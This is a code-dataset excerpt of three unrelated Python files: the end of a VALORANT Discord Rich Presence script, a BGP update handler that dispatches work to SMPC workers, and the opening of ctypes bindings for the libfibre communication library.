                hWnd = kernel32.GetConsoleWindow()
                user32.ShowWindow(hWnd, 0)
            except:
                pass
        # console visibility toggle functionality (tray menu callback)
        def tray_window_toggle(icon, item):
            try:
                global window_shown
                window_shown = not item.checked
                hWnd = kernel32.GetConsoleWindow()
                user32.ShowWindow(hWnd, window_shown)
            except:
                pass
        # build the tray menu and run the pystray icon loop (blocking)
        def run_systray():
            global systray, window_shown
            systray_menu = menu(
                item('VALORANT-RPC by restrafes', tray_window_toggle, enabled=False),
                item('Show Debug Window', tray_window_toggle, checked=lambda item: window_shown),
                item('Quit', exit_program)
            )
            systray = pystray.Icon("VALORANT RPC", Image.open("resources/favicon.ico"), "VALORANT RPC", systray_menu)
            systray.run()
        # True if any of the required game/launcher processes is running.
        # The mutable default list is only read, so it is harmless here.
        def is_process_running(required_processes=["VALORANT-Win64-Shipping.exe", "RiotClientServices.exe"]):
            processes = []
            for proc in psutil.process_iter():
                try:
                    processes.append(proc.name())
                except (PermissionError, AccessDenied):
                    pass # some processes are higher than user-level and cannot have its attributes accessed
            for process in required_processes:
                if process in processes:
                    return True
            return False
        # discord rpc implementation
        rpc, rpc_state = pypresence.Presence(client_id=str(config["client_id"])), None
        rpc_menu_default = {"large_image": "valorant-logo", "large_text": "VALORANT®"}
        rpc_gamemode_equivalents = config["rpc_gamemode_equivalents"]
        def rpc_update(**kwargs): # only interacts with the RPC api if the requested state is different than its current state
            global rpc, rpc_state
            if kwargs != rpc_state:
                print(kwargs)
                rpc.update(**kwargs)
                rpc_state = kwargs
        # if this is a clean run, start valorant and wait for authentication
        if not is_process_running():
            print("VALORANT not running, launching Riot Client...")
            open_game_client()
            while not is_process_running():
                time.sleep(1)
        # connect rpc
        rpc.connect()
        # create a thread for systray
        systray_thread = threading.Thread(target=run_systray)
        systray_thread.start()
        # yield for the lockfile containing all necessary credentials for the local riot api
        # NOTE(review): the `fetch_timeout <= cycles` test looks inverted;
        # presumably fetch_timeout <= 0 means "no timeout" — confirm against
        # the config's default value.
        lockfile, lockfile_wait_cycles = None, 0
        while (config["fetch_timeout"] <= lockfile_wait_cycles or config["fetch_timeout"] < 0) and lockfile is None and is_process_running():
            print(f"Waiting for LOCKFILE data... (Cycle #{lockfile_wait_cycles})")
            lockfile_wait_cycles += 1
            try:
                lockfile = get_lockfile()
            except:
                pass
        if lockfile is None: # close the program if a timeout is set and reached and no lockfile is detected
            print("LOCKFILE fetching timeout exceeded, exiting script...")
            exit_program()
        print(f"LOCKFILE: {lockfile}")
        # yield for session data from the local riot api
        session, session_wait_cycles = None, 0
        while (config["fetch_timeout"] <= session_wait_cycles or config["fetch_timeout"] < 0) and session is None and is_process_running():
            print(f"Waiting for game session data... (Cycle #{session_wait_cycles})")
            session_wait_cycles += 1
            try:
                session = get_session(lockfile, config)
            except RiotAuthError:
                print("Logged out response received, continue to yield...")
            except RiotRefuseError:
                print("Error 403 received, exiting script...")
                session = None
                exit_program()
            time.sleep(1)
        if session is None: # close the program if a timeout is set and reached and no session is detected
            print("Game session fetch timeout exceeded or client no longer running, exiting script...")
            exit_program()
        print(f"Session: {session}")
        # main script: poll the local presence endpoint and mirror it to Discord
        while is_process_running():
            time.sleep(config["update_interval"])
            network_presence = get_presence(lockfile, session, config)
            if network_presence:
                game_presence = get_game_presence(network_presence)
                if network_presence["state"] == "away": # if the game is idle on the menu screen
                    get_state = "In a Party" if game_presence["partySize"] > 1 else "Solo"
                    rpc_update(
                        **rpc_menu_default,
                        details = "Away",
                        party_size = [game_presence["partySize"], game_presence["maxPartySize"]],
                        state = get_state,
                        small_image = "away",
                        small_text = "Away"
                    )
                else: # if the player is in the lobby or in-game
                    if game_presence["sessionLoopState"] == "MENUS": # if the player is on the menu screem
                        get_state = ""
                        get_start = None
                        if game_presence["partyState"] == "MATCHMAKING":
                            get_state = "In Queue"
                            get_start = parse_time(game_presence["queueEntryTime"])
                        else:
                            get_state = "In a Party" if game_presence["partySize"] > 1 else "Solo"
                        rpc_update(
                            **rpc_menu_default,
                            details = (rpc_gamemode_equivalents[game_presence["queueId"]] if game_presence["queueId"] in rpc_gamemode_equivalents else "Discovery") + " (Lobby)",
                            party_size = [game_presence["partySize"], game_presence["maxPartySize"]],
                            state = get_state,
                            start = get_start
                        )
                    elif game_presence["sessionLoopState"] in ["INGAME", "PREGAME"]: # if the player is on the agent select screen or in a round
                        match_type = (rpc_gamemode_equivalents[game_presence["queueId"]] if game_presence["queueId"] in rpc_gamemode_equivalents else "Discovery")
                        # NOTE(review): partyVersion is used as the RPC start
                        # timestamp — confirm it is epoch-based.
                        get_start = game_presence["partyVersion"]
                        get_state = ""
                        if game_presence["sessionLoopState"] == "INGAME":
                            get_state = "In a Party" if game_presence["partySize"] > 1 else "Solo"
                        elif game_presence["sessionLoopState"] == "PREGAME":
                            get_state = "Agent Select"
                        rpc_update(
                            details = f"{match_type}: {game_presence['partyOwnerMatchScoreAllyTeam']} - {game_presence['partyOwnerMatchScoreEnemyTeam']}",
                            party_size = [game_presence["partySize"], game_presence["maxPartySize"]],
                            state = get_state,
                            start = get_start,
                            large_image = f"{to_map_name(config, game_presence['matchMap'], True).lower()}-splash",
                            large_text = f"{to_map_name(config, game_presence['matchMap'])}",
                            small_image = f"{match_type.lower()}-icon",
                            small_text = f"{match_type}"
                        )
            else:
                print("Could not fetch presence from the local server, the client process may have ended or it may take a little more time to start")
        print("The game process is no longer running, exiting script...")
        exit_program()
    except RuntimeError:
        pass # don't error out when the event loop is closed
    except Exception as program_exception:
        print(f"THERE WAS AN ERROR WHILE RUNNING THE PROGRAM: {program_exception}")
        messagebox.showerror(title="VALORANT RPC by restrafes", message=f"There was a problem while running the program:\n{traceback.format_exc()}")
    finally:
        sys.exit()
prio_handler_rs1.py | '''
receives BGP messages and assign them to the set of SMPC workers
'''
import argparse
import json
from multiprocessing.connection import Listener, Client
import os
import Queue
from threading import Thread
import sys
np = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if np not in sys.path:
sys.path.append(np)
import util.log
from server_pprs import server as Server
import random
import os
import pickle
import subprocess
from time import sleep
import time
import multiprocessing as mp
from multiprocessing import Process, Manager
import prio_worker_rs1
from load_ribs import load_ribs
from Queue import Empty
import threading
import port_config
from Queue import Queue, PriorityQueue
import sys
logger = util.log.getLogger('prio-handler-rs1')
RS1_MODE = 1
class PrioHandlerRs1:
    """Receives BGP update messages from ExaBGP and dispatches them to a pool
    of SMPC worker processes, serialising updates per prefix.

    Python 2 code (print statements, Queue module, sys.maxint). Updates for a
    prefix that is already being processed are parked in
    `prefix_2_messages_queued` and released one at a time as workers finish.
    """

    def __init__(self, asn_2_id_file, rib_file, number_of_processes):
        """Load the ASN->id map and optional RIB, connect to RS2 and spawn the
        worker pool.

        asn_2_id_file -- path to a JSON file mapping ASN -> numeric id
        rib_file -- optional RIB dump to preload routes from
        number_of_processes -- size of the SMPC worker pool
        """
        logger.info("Initializing the Priority Handler for RS1.")
        self.number_of_processes = number_of_processes
        with open(asn_2_id_file, 'r') as f:
            self.asn_2_id = json.load(f)
        self.prefix_2_nh_id_2_route = load_ribs(rib_file, self.asn_2_id, RS1_MODE) if rib_file else {}
        # Initialize a XRS Server
        self.server_receive_bgp_messages = Server(logger, endpoint=(port_config.process_assignement["rs1"], port_config.ports_assignment["rs1_receive_bgp_messages"]), authkey=None)
        # NOTE: fake sending, only for performance test
        #self.server_send_mpc_output = Server(logger, endpoint=(port_config.process_assignement["rs1"], port_config.ports_assignment["rs1_send_mpc_output"]),authkey=None)
        self.rs1_to_rs2_client = Client((port_config.process_assignement["rs2"], port_config.ports_assignment["rs1_rs2"]), authkey=None)
        logger.debug("connected to rs2")
        self.run = True
        self.lock = mp.Manager().Lock()
        #self.lock_stop = mp.Manager().Lock()
        #self.lock_stop.acquire()
        #self.stop_received=False
        # create workers
        self.manager = Manager()
        self.handler_to_worker_queue = self.manager.Queue() # it should be a priority queue
        self.worker_to_handler_queue = self.manager.Queue()
        self.worker_ids_queue = self.manager.Queue()
        # Python 2 `map` runs eagerly: pre-load one port id per worker.
        map(self.worker_ids_queue.put,range(port_config.ports_assignment["worker_port"],port_config.ports_assignment["worker_port"]+self.number_of_processes))
        self.prefix_2_messages_queued = {}
        self.prefixes_under_processing = set()
        self.workers_pool = mp.Pool(self.number_of_processes, prio_worker_rs1.prio_worker_main,(self.handler_to_worker_queue,self.worker_to_handler_queue,self.worker_ids_queue,))

    def start(self):
        """Start the BGP receiver thread, then process worker results on the
        calling thread (blocks until every worker reports STOP)."""
        self.receive_bgp_routes_th = Thread(target=self.receive_bgp_routes)
        self.receive_bgp_routes_th.setName("self.receive_bgp_routes_th")
        self.receive_bgp_routes_th.start()
        self.receive_from_workers()

    def receive_from_workers(self):
        """Forward worker output to RS2 and release per-prefix serialisation.

        Runs until a STOP message has been received from each worker.
        """
        waiting = 0
        stop_counter=self.number_of_processes
        while True:
            try:
                msg = self.worker_to_handler_queue.get(True, 1)
                if "stop" in msg:
                    logger.info("received STOP message from worker")
                    stop_counter -= 1
                    print "stop received " + str(stop_counter)
                    self.rs1_to_rs2_client.send(pickle.dumps(msg))
                    if stop_counter == 0:
                        # NOTE: fake sending, only for performance test
                        #self.server_send_mpc_output.sender_queue.put(pickle.dumps(msg))
                        time.sleep(5)
                        break
                    continue
                if msg["type"] == "to-rs2" or msg["type"] == "to-rs2-init":
                    self.rs1_to_rs2_client.send(pickle.dumps(msg))
                if msg["type"] == "to-hosts":
                    # NOTE: fake sending, only for performance test
                    #self.server_send_mpc_output.sender_queue.put(pickle.dumps(msg))
                    self.lock.acquire()
                    if msg["prefix"] in self.prefix_2_messages_queued.keys():
                        # A parked update exists for this prefix: record its
                        # route and hand it straight to the workers.
                        old_msg = self.prefix_2_messages_queued[msg["prefix"]].pop(0)
                        as_id = self.asn_2_id[old_msg["asn"]]
                        self.prefix_2_nh_id_2_route[msg["prefix"]][as_id] = {}
                        self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["announcement_id"] = old_msg["announcement_id"]
                        self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["key"] = old_msg["key"]
                        self.handler_to_worker_queue.put((old_msg["announcement_id"], {"prefix" : old_msg["prefix"], "announcement_id" : old_msg["announcement_id"], "encrypted_route" : old_msg["encrypted_route"], "as_id" : as_id, "messages" : self.prefix_2_nh_id_2_route[old_msg["prefix"]]}))
                        if len(self.prefix_2_messages_queued[old_msg["prefix"]]) == 0:
                            del self.prefix_2_messages_queued[old_msg["prefix"]]
                    else:
                        # Nothing queued: the prefix is free for new updates.
                        self.prefixes_under_processing.remove(msg["prefix"])
                    #if len(self.prefix_2_messages_queued.keys())==0 and self.stop_received:
                    #    self.lock_stop.release() # allow to send the STOP message to the workers
                    self.lock.release()
            except Empty:
                # Idle counter kept from the original; currently a no-op.
                if waiting == 0:
                    waiting = 1
                else:
                    waiting = (waiting % 30) + 1
                    if waiting == 30:
                        pass
        self.rs1_to_rs2_client.close()
        logger.debug("shutting down receive from workers")

    def receive_bgp_routes(self):
        """Receive BGP updates from ExaBGP and enqueue them for the workers,
        parking updates whose prefix is already being processed."""
        logger.info("Starting the Server to handle incoming BGP Updates from ExaBGP. Listening on port 6000")
        self.server_receive_bgp_messages.start()
        logger.info("Connected to ExaBGP via port 6000")
        # NOTE: fake sending, only for performance test
        #self.server_send_mpc_output.start()
        #logger.info("RS1 connected to Host Receiver Mock ")
        waiting = 0
        while self.run:
            # get BGP messages from ExaBGP
            try:
                msg = self.server_receive_bgp_messages.receiver_queue.get(True, 1)
                msg = pickle.loads(msg)
                waiting = 0
                # Received BGP bgp_update advertisement from ExaBGP
                if "stop" in msg:
                    close_msg = {"stop" : 1}
                    logger.info("Waiting 20 seconds before sending closing message " + str(close_msg))
                    print "getting stop lock..."
                    self.lock.acquire()
                    # NOTE(review): stop_received is only initialised in a
                    # commented-out line above — confirm it is read anywhere.
                    self.stop_received=True
                    self.lock.release()
                    print "Waiting 20 seconds before sending closing message "
                    time.sleep(20)
                    #self.lock_stop.acquire()
                    logger.info("Sending closing message " + str(close_msg))
                    print "Sending closing message"
                    # Drain the worker queue, then send one STOP per worker
                    # with the lowest possible priority (sys.maxint).
                    while not self.handler_to_worker_queue.empty():
                        sleep(1)
                    for _ in range(0,self.number_of_processes):
                        self.handler_to_worker_queue.put((sys.maxint,msg))
                    #self.lock_stop.release()
                    break
                else:
                    self.lock.acquire()
                    if msg["prefix"] in self.prefixes_under_processing:
                        # Prefix busy: park the update until a worker finishes.
                        if msg["prefix"] not in self.prefix_2_messages_queued.keys():
                            self.prefix_2_messages_queued[msg["prefix"]]=[]
                        self.prefix_2_messages_queued[msg["prefix"]].append(msg)
                        self.lock.release()
                    else:
                        self.lock.release()
                        if msg["prefix"] not in self.prefix_2_nh_id_2_route.keys():
                            self.prefix_2_nh_id_2_route[msg["prefix"]]={}
                        as_id = self.asn_2_id[msg["asn"]]
                        self.prefix_2_nh_id_2_route[msg["prefix"]][as_id] = {}
                        self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["announcement_id"] = msg["announcement_id"]
                        self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["key"] = msg["key"]
                        self.handler_to_worker_queue.put((msg["announcement_id"], {"prefix" : msg["prefix"], "announcement_id" : msg["announcement_id"], "encrypted_route" : msg["encrypted_route"], "as_id" : as_id, "messages" : self.prefix_2_nh_id_2_route[msg["prefix"]]}))
                        self.prefixes_under_processing.add(msg["prefix"])
            except Empty:
                # Idle counter kept from the original; currently a no-op.
                if waiting == 0:
                    waiting = 1
                else:
                    waiting = (waiting % 30) + 1
                    if waiting == 30:
                        pass
        logger.debug("receive_routes_shut_down")

    def stop(self):
        """Request shutdown (invoked from main() on KeyboardInterrupt).

        NOTE(review): this loop has no break/return, so the trailing
        statements only run if join() raises something other than
        KeyboardInterrupt — confirm the intended shutdown path.
        """
        while True:
            try:
                self.receive_bgp_routes_th.join(1)
                logger.debug("waiting for join receive_bgp_routes")
            except KeyboardInterrupt:
                self.run=False
        logger.info("Stopping.")
        self.run = False
def main():
    """CLI entry point: parse args, start the handler and wait for Ctrl-C."""
    parser = argparse.ArgumentParser()
    parser.add_argument("asn_2_id_file", type=str, help="specify asn_2_id json file")
    parser.add_argument('-r', '--rib_file', type=str, help='specify the rib file, eg.g. ../examples/test-rs/ribs/bview')
    parser.add_argument("-p","--processes", help="number of parallel SMPC processes", type=int, default=1)
    args = parser.parse_args()
    pprs = PrioHandlerRs1(args.asn_2_id_file, args.rib_file, args.processes)
    # Run the handler on a daemon thread so Ctrl-C reaches the main thread.
    rs_thread = Thread(target=pprs.start)
    rs_thread.setName("PrioHandler1Thread")
    rs_thread.daemon = True
    rs_thread.start()
    while rs_thread.is_alive():
        try:
            rs_thread.join(1)
            #logger.info("waiting for join pprs")
            #print "waiting for join pprs"
            #logger.debug("join cycle")
        except KeyboardInterrupt:
            pprs.stop()
    print "waiting before dying"
    logger.info("waiting before dying")
    # Dump the names of any threads still alive at shutdown (debug aid).
    for thread in threading.enumerate():
        print thread.name

if __name__ == '__main__':
    main()
|
libfibre.py | #!/bin/python
from ctypes import *
import asyncio
import os
from itertools import count, takewhile
import struct
from types import MethodType
import concurrent
import threading
import time
import platform
from .utils import Logger, Event
import sys
# Enable this for better tracebacks in some cases
#import tracemalloc
#tracemalloc.start(10)
# Prebuilt libfibre binary shipped for each supported (system, machine) pair.
lib_names = {
    ('Linux', 'x86_64'): 'libfibre-linux-amd64.so',
    ('Linux', 'armv7l'): 'libfibre-linux-armhf.so',
    ('Windows', 'AMD64'): 'libfibre-windows-amd64.dll',
    ('Darwin', 'x86_64'): 'libfibre-macos-x86.dylib'
}
# Key identifying the current platform in lib_names.
system_desc = (platform.system(), platform.machine())
script_dir = os.path.dirname(os.path.realpath(__file__))
# Candidate locations of an in-tree fibre-cpp checkout, searched before the
# copy shipped next to this file.
fibre_cpp_paths = [
    os.path.join(os.path.dirname(os.path.dirname(script_dir)), "cpp"),
    os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(script_dir)))), "Firmware", "fibre-cpp")
]
def get_first(lst, predicate, default):
    """Return the first item of *lst* for which *predicate* is truthy.

    Falls back to *default* when no item matches. Accepts any iterable
    (including generators), consuming it only as far as the first match.
    """
    return next((item for item in lst if predicate(item)), default)
# Fail early with instructions when there is no prebuilt binary for this
# platform.
if not system_desc in lib_names:
    raise ModuleNotFoundError(("libfibre is not supported on your platform ({} {}). "
                               "Go to https://github.com/samuelsadok/fibre-cpp/tree/devel for "
                               "instructions on how to compile libfibre. Once you have compiled it, "
                               "add it to this folder.").format(*system_desc))
lib_name = lib_names[system_desc]
# Prefer an in-tree fibre-cpp build over the copy next to this script.
search_paths = fibre_cpp_paths + [script_dir]
lib_path = get_first(
    (os.path.join(p, lib_name) for p in search_paths),
    os.path.isfile, None)
if lib_path is None:
    raise ModuleNotFoundError("{} was not found in {}".format(lib_name, search_paths))
# A tiny file is almost certainly an un-fetched git-lfs pointer, not a binary.
if os.path.getsize(lib_path) < 1000:
    raise ModuleNotFoundError("{} is too small. Did you forget to init git lfs? Try this:\n"
                              " 1. Install git lfs (https://git-lfs.github.com/)\n"
                              " 2. Run `cd {}`\n"
                              " 3. Run `git lfs install`\n"
                              " 4. Run `git lfs pull`".format(lib_path, os.path.dirname(lib_path)))
if os.name == 'nt':
    dll_dir = os.path.dirname(lib_path)
    try:
        # New way in python 3.8+
        os.add_dll_directory(dll_dir)
    except:
        # Pre-3.8 fallback: extend PATH so dependent DLLs can be located.
        os.environ['PATH'] = dll_dir + os.pathsep + os.environ['PATH']
    lib = windll.LoadLibrary(lib_path)
else:
    lib = cdll.LoadLibrary(lib_path)
# libfibre definitions --------------------------------------------------------#
# ctypes callback signatures for the event-loop bridge handed to libfibre.
PostSignature = CFUNCTYPE(c_int, CFUNCTYPE(None, c_void_p), POINTER(c_int))
RegisterEventSignature = CFUNCTYPE(c_int, c_int, c_uint32, CFUNCTYPE(None, c_void_p, c_int), POINTER(c_int))
DeregisterEventSignature = CFUNCTYPE(c_int, c_int)
CallLaterSignature = CFUNCTYPE(c_void_p, c_float, CFUNCTYPE(None, c_void_p), POINTER(c_int))
CancelTimerSignature = CFUNCTYPE(c_int, c_void_p)
# Discovery / object lifecycle callbacks.
OnFoundObjectSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p)
OnLostObjectSignature = CFUNCTYPE(None, c_void_p, c_void_p)
OnStoppedSignature = CFUNCTYPE(None, c_void_p, c_int)
# Interface introspection callbacks (attributes/functions added and removed).
OnAttributeAddedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_size_t, c_void_p, c_void_p, c_size_t)
OnAttributeRemovedSignature = CFUNCTYPE(None, c_void_p, c_void_p)
OnFunctionAddedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_size_t, POINTER(c_char_p), POINTER(c_char_p), POINTER(c_char_p), POINTER(c_char_p))
OnFunctionRemovedSignature = CFUNCTYPE(None, c_void_p, c_void_p)
# Call and transfer completion callbacks.
OnCallCompletedSignature = CFUNCTYPE(c_int, c_void_p, c_int, c_void_p, c_void_p, POINTER(c_void_p), POINTER(c_size_t), POINTER(c_void_p), POINTER(c_size_t))
OnTxCompletedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_int, c_void_p)
OnRxCompletedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_int, c_void_p)
# Status codes returned by libfibre calls.
kFibreOk = 0
kFibreBusy = 1
kFibreCancelled = 2
kFibreClosed = 3
kFibreInvalidArgument = 4
kFibreInternalError = 5
kFibreProtocolError = 6
kFibreHostUnreachable = 7
class LibFibreVersion(Structure):
    """Semantic version triple returned by libfibre_get_version()."""
    _fields_ = [
        ("major", c_uint16),
        ("minor", c_uint16),
        ("patch", c_uint16),
    ]

    def __repr__(self):
        # Render as the conventional dotted form, e.g. "0.1.7".
        return "%d.%d.%d" % (self.major, self.minor, self.patch)
class LibFibreEventLoop(Structure):
    """ctypes struct of event-loop callbacks passed to libfibre_open().

    The fields are populated with the LibFibre.c_* callback objects so that
    libfibre can schedule work on the Python asyncio loop.
    """
    _fields_ = [
        ("post", PostSignature),                      # run a callback on the loop thread
        ("register_event", RegisterEventSignature),   # watch an event fd
        ("deregister_event", DeregisterEventSignature),
        ("call_later", CallLaterSignature),           # schedule a delayed callback
        ("cancel_timer", CancelTimerSignature),
    ]
# C function prototypes of the libfibre API ----------------------------------#

libfibre_get_version = lib.libfibre_get_version
libfibre_get_version.argtypes = []
libfibre_get_version.restype = POINTER(LibFibreVersion)

# Refuse to run against a library with an incompatible major/minor version.
version = libfibre_get_version().contents
if (version.major, version.minor) != (0, 1):
    raise Exception("Incompatible libfibre version: {}".format(version))

# Context lifecycle.
libfibre_open = lib.libfibre_open
libfibre_open.argtypes = [LibFibreEventLoop]
libfibre_open.restype = c_void_p

libfibre_close = lib.libfibre_close
libfibre_close.argtypes = [c_void_p]
libfibre_close.restype = None

# Domain lifecycle (a domain is addressed by a path/filter string).
libfibre_open_domain = lib.libfibre_open_domain
libfibre_open_domain.argtypes = [c_void_p, c_char_p, c_size_t]
libfibre_open_domain.restype = c_void_p

libfibre_close_domain = lib.libfibre_close_domain
libfibre_close_domain.argtypes = [c_void_p]
libfibre_close_domain.restype = None

# Object discovery.
libfibre_start_discovery = lib.libfibre_start_discovery
libfibre_start_discovery.argtypes = [c_void_p, c_void_p, OnFoundObjectSignature, OnLostObjectSignature, OnStoppedSignature, c_void_p]
libfibre_start_discovery.restype = None

libfibre_stop_discovery = lib.libfibre_stop_discovery
libfibre_stop_discovery.argtypes = [c_void_p]
libfibre_stop_discovery.restype = None

# Interface introspection (attribute/function added/removed notifications).
libfibre_subscribe_to_interface = lib.libfibre_subscribe_to_interface
libfibre_subscribe_to_interface.argtypes = [c_void_p, OnAttributeAddedSignature, OnAttributeRemovedSignature, OnFunctionAddedSignature, OnFunctionRemovedSignature, c_void_p]
libfibre_subscribe_to_interface.restype = None

libfibre_get_attribute = lib.libfibre_get_attribute
libfibre_get_attribute.argtypes = [c_void_p, c_void_p, POINTER(c_void_p)]
libfibre_get_attribute.restype = c_int

# Remote function calls.
libfibre_call = lib.libfibre_call
libfibre_call.argtypes = [c_void_p, POINTER(c_void_p), c_int, c_void_p, c_size_t, c_void_p, c_size_t, POINTER(c_void_p), POINTER(c_void_p), OnCallCompletedSignature, c_void_p]
libfibre_call.restype = c_int

# Raw TX/RX stream operations (see TxStream / RxStream wrappers below).
libfibre_start_tx = lib.libfibre_start_tx
libfibre_start_tx.argtypes = [c_void_p, c_char_p, c_size_t, OnTxCompletedSignature, c_void_p]
libfibre_start_tx.restype = None

libfibre_cancel_tx = lib.libfibre_cancel_tx
libfibre_cancel_tx.argtypes = [c_void_p]
libfibre_cancel_tx.restype = None

libfibre_start_rx = lib.libfibre_start_rx
libfibre_start_rx.argtypes = [c_void_p, c_char_p, c_size_t, OnRxCompletedSignature, c_void_p]
libfibre_start_rx.restype = None

libfibre_cancel_rx = lib.libfibre_cancel_rx
libfibre_cancel_rx.argtypes = [c_void_p]
libfibre_cancel_rx.restype = None
# libfibre wrapper ------------------------------------------------------------#

class ObjectLostError(Exception):
    """Raised when an operation targets a remote object that disappeared."""

    def __init__(self):
        # Zero-argument super() is the Python 3 idiom; the original
        # super(Exception, self) skipped Exception itself in the MRO.
        super().__init__("the object disappeared")
def _get_exception(status):
    """Translate a libfibre status code into an exception instance.

    Returns None for kFibreOk; otherwise returns (does not raise) the
    exception object that represents the failure.
    """
    factories = {
        kFibreOk: lambda: None,
        kFibreCancelled: asyncio.CancelledError,
        kFibreClosed: EOFError,
        kFibreInvalidArgument: ArgumentError,
        kFibreInternalError: lambda: Exception("internal libfibre error"),
        kFibreProtocolError: lambda: Exception("peer misbehaving"),
        kFibreHostUnreachable: ObjectLostError,
    }
    make = factories.get(status, lambda: Exception("unknown libfibre error {}".format(status)))
    return make()
class StructCodec():
    """
    Generic serializer/deserializer based on struct pack.

    Values are coerced through *target_type* in both directions so they
    round-trip to their canonical Python type.
    """

    def __init__(self, struct_format, target_type):
        self._struct_format = struct_format
        self._target_type = target_type

    def get_length(self):
        """Number of bytes this codec reads/writes."""
        return struct.calcsize(self._struct_format)

    def serialize(self, libfibre, value):
        """Encode *value* (coerced to the target type) into bytes."""
        return struct.pack(self._struct_format, self._target_type(value))

    def deserialize(self, libfibre, buffer):
        """Decode *buffer* into a value of the target type."""
        fields = struct.unpack(self._struct_format, buffer)
        unwrapped = fields[0] if len(fields) == 1 else fields
        return self._target_type(unwrapped)
class ObjectPtrCodec():
    """
    Serializer/deserializer for an object reference.
    libfibre transcodes object references internally from/to something that can
    be sent over the wire and understood by the remote instance.
    """

    def get_length(self):
        # Pointer-sized on this platform.
        return struct.calcsize("P")

    def serialize(self, libfibre, value):
        # None maps to the null handle; RemoteObjects map to their handle.
        if value is None:
            return struct.pack("P", 0)
        if isinstance(value, RemoteObject):
            return struct.pack("P", value._obj_handle)
        raise TypeError("Expected value of type RemoteObject or None but got '{}'. An example for a RemoteObject is this expression: odrv0.axis0.controller._input_pos_property".format(type(value).__name__))

    def deserialize(self, libfibre, buffer):
        (handle,) = struct.unpack("P", buffer)
        if handle == 0:
            return None
        return libfibre._objects[handle]
# Registry mapping fibre codec names (as sent by the remote side) to
# serializer/deserializer instances. All integers are little-endian.
codecs = {
    'int8': StructCodec("<b", int),
    'uint8': StructCodec("<B", int),
    'int16': StructCodec("<h", int),
    'uint16': StructCodec("<H", int),
    'int32': StructCodec("<i", int),
    'uint32': StructCodec("<I", int),
    'int64': StructCodec("<q", int),
    'uint64': StructCodec("<Q", int),
    'bool': StructCodec("<?", bool),
    'float': StructCodec("<f", float),
    'object_ref': ObjectPtrCodec()
}
def decode_arg_list(arg_names, codec_names):
    """Yield (arg_name, codec_name, codec) triples from two parallel,
    NULL-terminated C string arrays.

    Raises if a codec name is not in the `codecs` registry.
    """
    index = 0
    while arg_names[index] is not None and codec_names[index] is not None:
        arg_name = arg_names[index].decode('utf-8')
        codec_name = codec_names[index].decode('utf-8')
        if codec_name not in codecs:
            raise Exception("unsupported codec {}".format(codec_name))
        yield arg_name, codec_name, codecs[codec_name]
        index += 1
def insert_with_new_id(dictionary, val):
    """Insert *val* under the smallest unused positive integer key.

    Returns the key that was assigned.
    """
    # Snapshot the keys once; the original rebuilt set(dictionary.keys())
    # for every probed candidate, making the search quadratic.
    used = set(dictionary)
    key = next(candidate for candidate in count(1) if candidate not in used)
    dictionary[key] = val
    return key
# Runs a function on a foreign event loop and blocks until the function is done.
def run_coroutine_threadsafe(loop, func):
    """Run *func* on the given asyncio loop's thread and block for its result.

    *func* may return a plain value or an awaitable; awaitables are awaited
    on the target loop. Exceptions raised by *func* propagate to the caller.
    NOTE: must be called from a thread other than the loop's own thread —
    blocking on future.result() from the loop thread would deadlock.
    """
    future = concurrent.futures.Future()
    async def func_async():
        try:
            result = func()
            if hasattr(result, '__await__'):
                result = await result
            future.set_result(result)
        except Exception as ex:
            # Forward the exception to the blocked caller.
            future.set_exception(ex)
    loop.call_soon_threadsafe(asyncio.ensure_future, func_async())
    return future.result()
class TxStream():
    """Python wrapper for libfibre's LibFibreTxStream interface"""

    def __init__(self, libfibre, tx_stream_handle):
        self._libfibre = libfibre
        self._tx_stream_handle = tx_stream_handle  # opaque handle owned by libfibre
        self._future = None  # future of the in-flight write(), if any
        self._tx_buf = None  # buffer of the in-flight write(); kept referenced for the C side
        # Keep a reference to the ctypes callback object so it is not garbage
        # collected while libfibre may still invoke it.
        self._c_on_tx_completed = OnTxCompletedSignature(self._on_tx_completed)
        self.is_closed = False

    def _on_tx_completed(self, ctx, tx_stream, status, tx_end):
        # Completion callback invoked by libfibre. tx_end points one past the
        # last byte written; the difference to the buffer start gives the
        # number of bytes actually sent.
        tx_start = cast(self._tx_buf, c_void_p).value
        n_written = tx_end - tx_start
        assert(n_written <= len(self._tx_buf))
        future = self._future
        self._future = None
        self._tx_buf = None
        if status == kFibreClosed:
            self.is_closed = True
        if status == kFibreOk or status == kFibreClosed:
            future.set_result(n_written)
        else:
            future.set_exception(_get_exception(status))

    def write(self, data):
        """
        Writes the provided data to the stream. Not all bytes are guaranteed to
        be written. The caller should check the return value to determine the
        actual number of bytes written.
        If a non-empty buffer is provided, this function will either write at
        least one byte to the output, set is_closed to True or throw an
        Exception (through the future).
        Currently only one write call may be active at a time (this may change
        in the future).
        Returns: A future that completes with the number of bytes actually
        written or an Exception.
        """
        assert(self._future is None)  # only one write may be in flight
        self._future = future = self._libfibre.loop.create_future()
        self._tx_buf = data # Retain a reference to the buffer to prevent it from being garbage collected
        libfibre_start_tx(self._tx_stream_handle,
            cast(self._tx_buf, c_char_p), len(self._tx_buf),
            self._c_on_tx_completed, None)
        return future

    async def write_all(self, data):
        """
        Writes all of the provided data to the stream or completes with an
        Exception.
        If an empty buffer is provided, the underlying stream's write function
        is still called at least once.
        Returns: A future that either completes with an empty result or with
        an Exception.
        """
        while True:
            n_written = await self.write(data)
            data = data[n_written:]  # keep only the unsent tail
            if len(data) == 0:
                break
            elif self.is_closed:
                raise EOFError("the TX stream was closed but there are still {} bytes left to send".format(len(data)))
            assert(n_written > 0) # Ensure progress
class RxStream():
    """Python wrapper for libfibre's LibFibreRxStream interface"""

    def __init__(self, libfibre, rx_stream_handle):
        self._libfibre = libfibre
        self._rx_stream_handle = rx_stream_handle  # opaque handle owned by libfibre
        self._future = None  # future of the in-flight read(), if any
        self._rx_buf = None  # buffer of the in-flight read(); kept referenced for the C side
        # Keep a reference to the ctypes callback object so it is not garbage
        # collected while libfibre may still invoke it.
        self._c_on_rx_completed = OnRxCompletedSignature(self._on_rx_completed)
        self.is_closed = False

